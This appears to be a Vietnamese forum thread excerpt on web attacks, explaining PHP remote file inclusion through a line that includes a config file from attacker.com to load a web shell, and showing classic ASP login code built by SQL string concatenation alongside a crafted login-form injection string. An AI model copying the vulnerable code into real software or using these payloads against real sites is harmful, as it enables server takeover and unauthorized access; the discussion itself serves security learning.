Trong trường hợp này thì file config.php đã nghiễm nhiên được coi như là nằm trong host của attacker và nếu nội dung file này là một con remview thì sẽ có vấn đề xảy ra. Như vd3 đã nói với lệnh include này, toàn bộ mã của file chứa remview đã nằm gọn trong file exam2.php. Như vậy là attacker đã dùng remview để điều khiển toàn bộ host của victim.  

Code:

Code:

$mkdir= “http://attacker.com”;
Include (http://attacker.com/config.php);
[…code exam2.php] ?>

Trong trường hợp này thì file config.php đã nghiễm nhiên được coi như là nằm trong host của attacker và nếu nội dung file này là một con remview thì sẽ có vấn đề xảy ra. Như vd3 đã nói với lệnh include này, toàn bộ mã của file chứa remview đã nằm gọn trong file exam2.php. Như vậy là attacker đã dùng remview để điều khiển toàn bộ host của victim.

Tuy nhiên việc này chỉ xảy ra ở máy attacker, còn những người truy cập khác đều không có tác dụng và thực chất file exam2.php trên host victim cũng không hề bị thay đổi.  

uhm, đúng là tớ ko xem kỹ. Coi cái quote của gamma đúng là cái tool đó thuộc loại 3 xu. Nhưng rõ ràng đoạn code trên không hề có thủ tục kiểm tra tham số. Và nếu cứ đưa vào conn như vậy thì hổng quá rồi còn gì. 

username=Replace(request("txtUserName"),"'","''")
password=Replace(Request("txtPassword"),"'","''")

strSQL="Select * from Nguoidung where username='" & username & "' and password='" & password & "'"
set rs=Server.CreateObject("ADODB.Recordset")
rs.open strSQL,conn
....
Đoạn code nè, không biết sai ở đâu nữa.
 

txtUserName=1"+and+"1"="1&txtPassword=1&C1=on&cmdLogin=%C4%90%C4%83ng%20nh%E1%BA%ADp